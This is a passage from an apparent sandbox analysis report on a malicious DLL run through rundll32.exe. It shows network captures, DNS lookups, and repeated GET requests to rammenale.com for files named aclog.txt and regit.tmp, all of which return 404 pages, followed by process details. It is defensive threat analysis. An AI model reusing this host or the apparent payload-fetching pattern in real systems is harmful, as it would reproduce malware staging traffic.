            Aug 28, 2024 22:45:58.706437111 CEST49708443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:58.706460953 CEST49708443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:58.731487989 CEST49709443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:58.731508017 CEST44349709131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:58.731533051 CEST49709443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:58.731554985 CEST49709443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:59.563813925 CEST44349712131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:59.563956022 CEST49712443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:59.568371058 CEST49712443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:59.568377018 CEST44349712131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:59.568732023 CEST44349712131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:59.568804979 CEST49712443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:59.570513964 CEST49712443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:59.603842020 CEST44349711131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:59.603914022 CEST49711443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:59.609014988 CEST49711443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:59.609026909 CEST44349711131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:59.609307051 CEST44349711131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:59.609369993 CEST49711443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:59.611387014 CEST49711443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:59.616499901 CEST44349712131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:59.656500101 CEST44349711131.153.206.231192.168.2.5
            Aug 28, 2024 22:46:00.187422037 CEST44349712131.153.206.231192.168.2.5
            Aug 28, 2024 22:46:00.187477112 CEST49712443192.168.2.5131.153.206.231
            Aug 28, 2024 22:46:00.187493086 CEST44349712131.153.206.231192.168.2.5
            Aug 28, 2024 22:46:00.187546015 CEST49712443192.168.2.5131.153.206.231
            Aug 28, 2024 22:46:00.187577963 CEST44349712131.153.206.231192.168.2.5
            Aug 28, 2024 22:46:00.187660933 CEST44349712131.153.206.231192.168.2.5
            Aug 28, 2024 22:46:00.187679052 CEST49712443192.168.2.5131.153.206.231
            Aug 28, 2024 22:46:00.187704086 CEST49712443192.168.2.5131.153.206.231
            Aug 28, 2024 22:46:00.188194036 CEST49712443192.168.2.5131.153.206.231
            Aug 28, 2024 22:46:00.188215017 CEST44349712131.153.206.231192.168.2.5
            Aug 28, 2024 22:46:00.188222885 CEST49712443192.168.2.5131.153.206.231
            Aug 28, 2024 22:46:00.188277960 CEST49712443192.168.2.5131.153.206.231
            Aug 28, 2024 22:46:01.179564953 CEST44349711131.153.206.231192.168.2.5
            Aug 28, 2024 22:46:01.179737091 CEST44349711131.153.206.231192.168.2.5
            Aug 28, 2024 22:46:01.179771900 CEST49711443192.168.2.5131.153.206.231
            Aug 28, 2024 22:46:01.180006027 CEST49711443192.168.2.5131.153.206.231
            Aug 28, 2024 22:46:01.180243015 CEST49711443192.168.2.5131.153.206.231
            Aug 28, 2024 22:46:01.180243015 CEST49711443192.168.2.5131.153.206.231
            Aug 28, 2024 22:46:01.180270910 CEST44349711131.153.206.231192.168.2.5
            Aug 28, 2024 22:46:01.185206890 CEST49711443192.168.2.5131.153.206.231

            UDP Packets

            TimestampSource PortDest PortSource IPDest IP
            Aug 28, 2024 22:45:55.074853897 CEST5684153192.168.2.51.1.1.1
            Aug 28, 2024 22:45:55.134756088 CEST53568411.1.1.1192.168.2.5
            Aug 28, 2024 22:46:26.489363909 CEST5352145162.159.36.2192.168.2.5
            Aug 28, 2024 22:46:26.959573984 CEST6095053192.168.2.51.1.1.1
            Aug 28, 2024 22:46:26.966577053 CEST53609501.1.1.1192.168.2.5

            DNS Queries

            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Aug 28, 2024 22:45:55.074853897 CEST192.168.2.51.1.1.10x6ca4Standard query (0)rammenale.comA (IP address)IN (0x0001)false
            Aug 28, 2024 22:46:26.959573984 CEST192.168.2.51.1.1.10x21a7Standard query (0)198.187.3.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false

            DNS Answers

            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Aug 28, 2024 22:45:55.134756088 CEST1.1.1.1192.168.2.50x6ca4No error (0)rammenale.com131.153.206.231A (IP address)IN (0x0001)false
            Aug 28, 2024 22:46:26.966577053 CEST1.1.1.1192.168.2.50x21a7Name error (3)198.187.3.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

            HTTP Request Dependency Graph

            • rammenale.com

            HTTPS Proxied Packets

            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.549705131.153.206.2314437500C:\Windows\SysWOW64\rundll32.exe
            TimestampBytes transferredDirectionData
            2024-08-28 20:45:56 UTC287OUTGET /for2/aclog.txt HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Host: rammenale.com
            Connection: Keep-Alive
            2024-08-28 20:45:57 UTC416INHTTP/1.1 404 Not Found
            Connection: close
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1251
            date: Wed, 28 Aug 2024 20:45:57 GMT
            server: LiteSpeed
            alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
            2024-08-28 20:45:57 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
            2024-08-28 20:45:57 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
            Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.549704131.153.206.2314437484C:\Windows\SysWOW64\rundll32.exe
            TimestampBytes transferredDirectionData
            2024-08-28 20:45:56 UTC287OUTGET /for2/aclog.txt HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Host: rammenale.com
            Connection: Keep-Alive
            2024-08-28 20:45:57 UTC416INHTTP/1.1 404 Not Found
            Connection: close
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1251
            date: Wed, 28 Aug 2024 20:45:57 GMT
            server: LiteSpeed
            alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
            2024-08-28 20:45:57 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
            2024-08-28 20:45:57 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
            Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            2192.168.2.549708131.153.206.2314437756C:\Windows\SysWOW64\rundll32.exe
            TimestampBytes transferredDirectionData
            2024-08-28 20:45:58 UTC287OUTGET /for2/regit.tmp HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Host: rammenale.com
            Connection: Keep-Alive
            2024-08-28 20:45:58 UTC416INHTTP/1.1 404 Not Found
            Connection: close
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1251
            date: Wed, 28 Aug 2024 20:45:58 GMT
            server: LiteSpeed
            alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
            2024-08-28 20:45:58 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
            2024-08-28 20:45:58 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
            Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            3192.168.2.549709131.153.206.2314437748C:\Windows\SysWOW64\rundll32.exe
            TimestampBytes transferredDirectionData
            2024-08-28 20:45:58 UTC287OUTGET /for2/regit.tmp HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Host: rammenale.com
            Connection: Keep-Alive
            2024-08-28 20:45:58 UTC416INHTTP/1.1 404 Not Found
            Connection: close
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1251
            date: Wed, 28 Aug 2024 20:45:58 GMT
            server: LiteSpeed
            alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
            2024-08-28 20:45:58 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
            2024-08-28 20:45:58 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
            Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            4192.168.2.549712131.153.206.2314438024C:\Windows\SysWOW64\rundll32.exe
            TimestampBytes transferredDirectionData
            2024-08-28 20:45:59 UTC287OUTGET /for2/regit.tmp HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Host: rammenale.com
            Connection: Keep-Alive
            2024-08-28 20:46:00 UTC416INHTTP/1.1 404 Not Found
            Connection: close
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1251
            date: Wed, 28 Aug 2024 20:45:59 GMT
            server: LiteSpeed
            alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
            2024-08-28 20:46:00 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
            2024-08-28 20:46:00 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
            Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            5192.168.2.549711131.153.206.2314437952C:\Windows\SysWOW64\rundll32.exe
            TimestampBytes transferredDirectionData
            2024-08-28 20:45:59 UTC287OUTGET /for2/aclog.txt HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Host: rammenale.com
            Connection: Keep-Alive
            2024-08-28 20:46:01 UTC416INHTTP/1.1 404 Not Found
            Connection: close
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1251
            date: Wed, 28 Aug 2024 20:46:00 GMT
            server: LiteSpeed
            alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
            2024-08-28 20:46:01 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
            2024-08-28 20:46:01 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
            Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


            Statistics

            CPU Usage

            Click to jump to process

            Memory Usage

            Click to jump to process

            Behavior

            Click to jump to process

            System Behavior

            General

            Target ID:0
            Start time:16:45:53
            Start date:28/08/2024
            Path:C:\Windows\System32\loaddll32.exe
            Wow64 process (32bit):true
            Commandline:loaddll32.exe "C:\Users\user\Desktop\Dll1.dll"
            Imagebase:0x330000
            File size:126'464 bytes
            MD5 hash:51E6071F9CBA48E79F10C84515AAE618
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:1
            Start time:16:45:53
            Start date:28/08/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff6d64d0000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:2
